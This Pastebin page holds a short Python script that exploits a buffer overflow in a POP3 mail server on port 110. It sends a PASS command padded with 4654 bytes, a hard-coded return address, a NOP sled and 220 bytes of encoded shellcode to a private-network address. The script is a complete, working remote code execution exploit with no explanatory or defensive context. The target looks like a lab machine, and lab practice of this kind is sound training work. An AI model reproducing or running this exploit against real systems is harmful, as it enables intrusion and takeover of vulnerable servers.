Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import struct
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- ret = "\x8F\x35\x4a\x5f" #Address 5F4A358F
- #Shellcode length 220 bytes
- shellcode = ("\xba\xf9\x13\xb5\xde\xda\xd0\xd9\x74\x24\xf4\x5d\x29\xc9" +
- "\xb1\x31\x31\x55\x13\x83\xed\xfc\x03\x55\xf6\xf1\x40\x22" +
- "\xe0\x74\xaa\xdb\xf0\x18\x22\x3e\xc1\x18\x50\x4a\x71\xa9" +
- "\x12\x1e\x7d\x42\x76\x8b\xf6\x26\x5f\xbc\xbf\x8d\xb9\xf3" +
- "\x40\xbd\xfa\x92\xc2\xbc\x2e\x75\xfb\x0e\x23\x74\x3c\x72" +
- "\xce\x24\x95\xf8\x7d\xd9\x92\xb5\xbd\x52\xe8\x58\xc6\x87" +
- "\xb8\x5b\xe7\x19\xb3\x05\x27\x9b\x10\x3e\x6e\x83\x75\x7b" +
- "\x38\x38\x4d\xf7\xbb\xe8\x9c\xf8\x10\xd5\x11\x0b\x68\x11" +
- "\x95\xf4\x1f\x6b\xe6\x89\x27\xa8\x95\x55\xad\x2b\x3d\x1d" +
- "\x15\x90\xbc\xf2\xc0\x53\xb2\xbf\x87\x3c\xd6\x3e\x4b\x37" +
- "\xe2\xcb\x6a\x98\x63\x8f\x48\x3c\x28\x4b\xf0\x65\x94\x3a" +
- "\x0d\x75\x77\xe2\xab\xfd\x95\xf7\xc1\x5f\xf3\x06\x57\xda" +
- "\xb1\x09\x67\xe5\xe5\x61\x56\x6e\x6a\xf5\x67\xa5\xcf\x09" +
- "\x22\xe4\x79\x82\xeb\x7c\x38\xcf\x0b\xab\x7e\xf6\x8f\x5e" +
- "\xfe\x0d\x8f\x2a\xfb\x4a\x17\xc6\x71\xc2\xf2\xe8\x26\xe3" +
- "\xd6\x8a\xa9\x77\xba\x62\x4c\xf0\x59\x7b")
- buffer = ("A" * 4654) + ret + ("\x90" * 10) + shellcode + ("\x90" * (5000 - 4654 - 4 - 40 - 220))
- try:
- s.connect(('192.168.0.18',110))
- data = s.recv(1024)
- s.send('USER username' +'\r\n')
- data = s.recv(1024)
- s.send('PASS ' + buffer + '\r\n')
- data = s.recv(1024)
- s.close()
- except:
- print "Unable to connect"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
